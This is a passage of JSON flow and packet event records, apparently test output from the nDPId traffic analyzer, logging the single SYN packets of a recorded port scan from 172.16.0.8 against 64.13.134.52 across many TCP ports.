+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":386,"source":"synscan.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"synscan.pcap","alias":"nDPId-test","flow_id":380,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAsLroAACwG7bisEAAIQA2GNIzSEA\/dUoMYAAAAAGACBAAkgAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":387,"source":"synscan.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19780,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"synscan.pcap","alias":"nDPId-test","flow_id":381,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAsCv8AAC4GD3SsEAAIQA2GNIzSTUTdUoMYAAAAAGACDADfSgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":388,"source":"synscan.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":388,"source":"synscan.pcap","alias":"nDPId-test","flow_id":382,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/JoAACYGJdisEAAIQA2GNIzSHnjdUoMYAAAAAGACDAAOFwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"synscan.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"synscan.pcap","alias":"nDPId-test","flow_id":383,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAsnFAAAC4GfiKsEAAIQA2GNIzSBD\/dUoMYAAAAAGACDAAoUAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":390,"source":"synscan.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"synscan.pcap","alias":"nDPId-test","flow_id":384,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAs4+0AADUGL4WsEAAIQA2GNIzSBoLdUoMYAAAAAGACCAAqDQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":391,"source":"synscan.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3809,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"synscan.pcap","alias":"nDPId-test","flow_id":385,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAsav8AADsGonOsEAAIQA2GNIzTDuHdU4MZAAAAAGACEAAZqwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":392,"source":"synscan.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3827,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"synscan.pcap","alias":"nDPId-test","flow_id":386,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/dIAACcGI6CsEAAIQA2GNIzTDvPdU4MZAAAAAGACEAAZmQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":393,"source":"synscan.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"synscan.pcap","alias":"nDPId-test","flow_id":387,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAs8f8AACcGL3OsEAAIQA2GNIzTFf\/dU4MZAAAAAGACEAASjQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":394,"source":"synscan.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"synscan.pcap","alias":"nDPId-test","flow_id":388,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAsf98AADQGlJOsEAAIQA2GNIzTB9HdU4MZAAAAAGACBAAsuwAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":395,"source":"synscan.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"synscan.pcap","alias":"nDPId-test","flow_id":389,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAs4wcAACgGPWusEAAIQA2GNIzTPoHdU4MZAAAAAGACBAD2CgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":396,"source":"synscan.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"synscan.pcap","alias":"nDPId-test","flow_id":390,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAsxOgAACoGWYqsEAAIQA2GNIzTECHdU4MZAAAAAGACDAAcawAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":397,"source":"synscan.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2811,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"synscan.pcap","alias":"nDPId-test","flow_id":391,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAsfUMAAC0Gni+sEAAIQA2GNIzTCvvdU4MZAAAAAGACCAAlkQAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":398,"source":"synscan.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":398,"source":"synscan.pcap","alias":"nDPId-test","flow_id":392,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAsdR4AACkGqlSsEAAIQA2GNIzTDZTdU4MZAAAAAGACCAAi+AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":399,"source":"synscan.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":399,"source":"synscan.pcap","alias":"nDPId-test","flow_id":393,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAs2GAAACkGRxKsEAAIQA2GNIzTB\/7dU4MZAAAAAGACCAAojgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":400,"source":"synscan.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2522,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":400,"source":"synscan.pcap","alias":"nDPId-test","flow_id":394,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAse2wAADEGnAasEAAIQA2GNIzTCdrdU4MZAAAAAGACCAAmsgAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":401,"source":"synscan.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"synscan.pcap","alias":"nDPId-test","flow_id":395,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAsoZYAADAGdtysEAAIQA2GNIzTBCTdU4MZAAAAAGACBAAwaAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":402,"source":"synscan.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1047,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":402,"source":"synscan.pcap","alias":"nDPId-test","flow_id":396,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAsB5YAACkGF92sEAAIQA2GNIzTBBfdU4MZAAAAAGACCAAsdQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":403,"source":"synscan.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058906,"flow_last_seen":1278275058906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058906,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8086,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"synscan.pcap","alias":"nDPId-test","flow_id":397,"flow_packet_id":1,"flow_last_seen":1278275058906,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058906,"pkt":"ACYLMQczACWzv5HuCABFAAAsekUAAC8Gny2sEAAIQA2GNIzTH5bdU4MZAAAAAGACEAAI9gAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":404,"source":"synscan.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058906,"flow_last_seen":1278275058906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058906,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1154,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":404,"source":"synscan.pcap","alias":"nDPId-test","flow_id":398,"flow_packet_id":1,"flow_last_seen":1278275058906,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058906,"pkt":"ACYLMQczACWzv5HuCABFAAAsvlsAAC0GXResEAAIQA2GNIzTBILdU4MZAAAAAGACCAAsCgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":405,"source":"synscan.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058906,"flow_last_seen":1278275058906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058906,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":405,"source":"synscan.pcap","alias":"nDPId-test","flow_id":399,"flow_packet_id":1,"flow_last_seen":1278275058906,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058906,"pkt":"ACYLMQczACWzv5HuCABFAAAsLE8AACYG9iOsEAAIQA2GNIzTBfTdU4MZAAAAAGACDAAmmAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":406,"source":"synscan.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"synscan.pcap","alias":"nDPId-test","flow_id":400,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAs4LEAADcGMMGsEAAIQA2GNIzTBoLdU4MZAAAAAGACEAAiCgAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":407,"source":"synscan.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"synscan.pcap","alias":"nDPId-test","flow_id":401,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAsgKkAACgGn8msEAAIQA2GNIzTBD\/dU4MZAAAAAGACBAAwTQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":408,"source":"synscan.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"synscan.pcap","alias":"nDPId-test","flow_id":402,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAsqWEAADIGbRGsEAAIQA2GNIzTHnjdU4MZAAAAAGACDAAOFAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":409,"source":"synscan.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19780,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"synscan.pcap","alias":"nDPId-test","flow_id":403,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAsfMoAACYGpaisEAAIQA2GNIzTTUTdU4MZAAAAAGACDADfRwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":410,"source":"synscan.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 